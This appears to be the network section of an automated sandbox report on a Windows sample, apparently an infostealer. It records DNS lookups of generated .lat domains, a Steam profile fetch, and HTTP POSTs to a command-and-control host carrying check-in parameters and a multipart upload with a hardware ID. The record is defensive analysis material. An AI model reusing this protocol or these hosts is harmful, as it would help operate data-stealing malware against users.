                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205600977 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205607891 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.205655098 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209093094 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209114075 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209157944 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209166050 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209382057 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209382057 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.209873915 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.224205971 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373261929 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373281002 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373426914 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373450994 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373754025 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.373989105 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377538919 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377552986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377614021 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.377624035 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382036924 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382064104 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382107019 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382116079 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382154942 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.382188082 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396414042 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396429062 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396456957 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396514893 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396514893 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.396526098 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397531986 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397572041 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397578001 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397593975 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397603989 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397610903 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397663116 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.397663116 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853903055 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853924036 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853961945 CET49745443192.168.2.53.5.16.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:53.853971958 CET443497453.5.16.86192.168.2.5
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.826811075 CET5765853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.964447975 CET53576581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:19.969986916 CET5348353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.109761000 CET53534831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.251882076 CET5330053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.389487028 CET53533001.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.422353983 CET5653353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.566075087 CET53565331.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.575001955 CET5748753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.714078903 CET53574871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.737541914 CET5197253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.876513958 CET53519721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:20.908101082 CET6206353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.045850039 CET53620631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.049421072 CET5950753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.187879086 CET53595071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.191726923 CET5648853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.329380035 CET53564881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.331176996 CET5149053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.468461037 CET53514901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.917895079 CET5726153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.055941105 CET53572611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.446219921 CET6511353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:46.584954977 CET53651131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:48.871879101 CET6489853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:49.177618980 CET53648981.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 07:26:19.826811075 CET | 192.168.2.5 | 1.1.1.1 | 0x5947 | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:19.969986916 CET | 192.168.2.5 | 1.1.1.1 | 0xbb4d | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.251882076 CET | 192.168.2.5 | 1.1.1.1 | 0x2fd4 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.422353983 CET | 192.168.2.5 | 1.1.1.1 | 0x7 | Standard query (0) | necklacebudi.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.575001955 CET | 192.168.2.5 | 1.1.1.1 | 0xce2e | Standard query (0) | energyaffai.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.737541914 CET | 192.168.2.5 | 1.1.1.1 | 0x9bb2 | Standard query (0) | aspecteirs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.908101082 CET | 192.168.2.5 | 1.1.1.1 | 0x725c | Standard query (0) | sustainskelet.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.049421072 CET | 192.168.2.5 | 1.1.1.1 | 0xc831 | Standard query (0) | crosshuaht.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.191726923 CET | 192.168.2.5 | 1.1.1.1 | 0xf37a | Standard query (0) | rapeflowwj.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.331176996 CET | 192.168.2.5 | 1.1.1.1 | 0xf8b8 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:23.917895079 CET | 192.168.2.5 | 1.1.1.1 | 0x1ba9 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:46.446219921 CET | 192.168.2.5 | 1.1.1.1 | 0x1e40 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:48.871879101 CET192.168.2.51.1.1.10x344dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 07:26:19.964447975 CET | 1.1.1.1 | 192.168.2.5 | 0x5947 | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.109761000 CET | 1.1.1.1 | 192.168.2.5 | 0xbb4d | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.389487028 CET | 1.1.1.1 | 192.168.2.5 | 0x2fd4 | Name error (3) | discokeyus.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.566075087 CET | 1.1.1.1 | 192.168.2.5 | 0x7 | Name error (3) | necklacebudi.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.714078903 CET | 1.1.1.1 | 192.168.2.5 | 0xce2e | Name error (3) | energyaffai.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:20.876513958 CET | 1.1.1.1 | 192.168.2.5 | 0x9bb2 | Name error (3) | aspecteirs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.045850039 CET | 1.1.1.1 | 192.168.2.5 | 0x725c | Name error (3) | sustainskelet.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.187879086 CET | 1.1.1.1 | 192.168.2.5 | 0xc831 | Name error (3) | crosshuaht.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.329380035 CET | 1.1.1.1 | 192.168.2.5 | 0xf37a | Name error (3) | rapeflowwj.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:21.468461037 CET | 1.1.1.1 | 192.168.2.5 | 0xf8b8 | No error (0) | steamcommunity.com |  | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:24.055941105 CET | 1.1.1.1 | 192.168.2.5 | 0x1ba9 | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:24.055941105 CET | 1.1.1.1 | 192.168.2.5 | 0x1ba9 | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:46.584954977 CET | 1.1.1.1 | 192.168.2.5 | 0x1e40 | No error (0) | bitbucket.org |  | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:46.584954977 CET | 1.1.1.1 | 192.168.2.5 | 0x1e40 | No error (0) | bitbucket.org |  | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:46.584954977 CET | 1.1.1.1 | 192.168.2.5 | 0x1e40 | No error (0) | bitbucket.org |  | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.16.86 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.216.8.163 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.21.138 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.25.204 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.216.38.209 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.30.101 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.216.187.51 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 07:26:49.177618980 CET | 1.1.1.1 | 192.168.2.5 | 0x344d | No error (0) | s3-w.us-east-1.amazonaws.com |  | 54.231.192.89 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • lev-tolstoi.com
                                                                                                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:22 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
2024-12-23 06:26:23 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:23 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-23 06:26:23 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 06:26:23 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-23 06:26:23 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:25 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:25 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
2024-12-23 06:26:26 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=sq97uf92e1p6mru06a7q9ld41b; expires=Fri, 18 Apr 2025 00:13:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tw1q%2BDkYDwwq8h8ogp%2Fe7qdRPRSe3txl7f7Qp2a7FJ9LSTUD57yFF3%2BU5kPMOQ1efBNZ9jlVb8QsIrkHvx1HPr8VFocKA%2FR43iZ6ZCDGxq%2FZOcEAq%2BUd%2FrbW6ZCQBj%2BmQro%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647ada9270f6f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1490&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1907250&cwnd=209&unsent_bytes=0&cid=3347de1ad69679f1&ts=763&x=0"
2024-12-23 06:26:26 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 06:26:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:27 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:27 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 06:26:28 UTC | 1119 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:28 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=g9gtilvam1ignrao5ohd2gnooq; expires=Fri, 18 Apr 2025 00:13:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4RXWIn3gpe1OYeKM6kVV7gPu6BRJZWxZI46KkdpQpP30U3rYp6GnejsHVGduU4FoXLvfWxevH%2FkEKHfwovK0DUfqGleip8Rdnc0Uim3Wmcus1LLl2CDtsMDVKL1oiFUQ0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647bbbe2542bd-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1582&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1831869&cwnd=196&unsent_bytes=0&cid=16fa89ee0f96b1b8&ts=790&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:30 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=0UCQVNE1GL0P
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12805
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:30 UTC | 12805 | OUT | Data Raw: 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 55 43 51 56 4e 45 31 47 4c 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 55 43 51 56 4e 45 31
                                                                                                                                                                                                                                                                        Data Ascii: --0UCQVNE1GL0PContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--0UCQVNE1GL0PContent-Disposition: form-data; name="pid"2--0UCQVNE1GL0PContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0UCQVNE1
2024-12-23 06:26:31 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=s1vc10f2lgsbtf6l4h3ouhvqc6; expires=Fri, 18 Apr 2025 00:13:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bojmhzCEVES89E1M3ZPXXFTQuTPwbVj9TzCUdxFQ3Fn6VlPQQbTjAW7R%2FYK2IMFLxJ2ANlw58O4j85BvOzm%2BrUfY9Y71M%2BKutEM0wOcd%2B%2B7PaKoOfsDFDufHMTPXBEiQ728%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647ca88854394-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
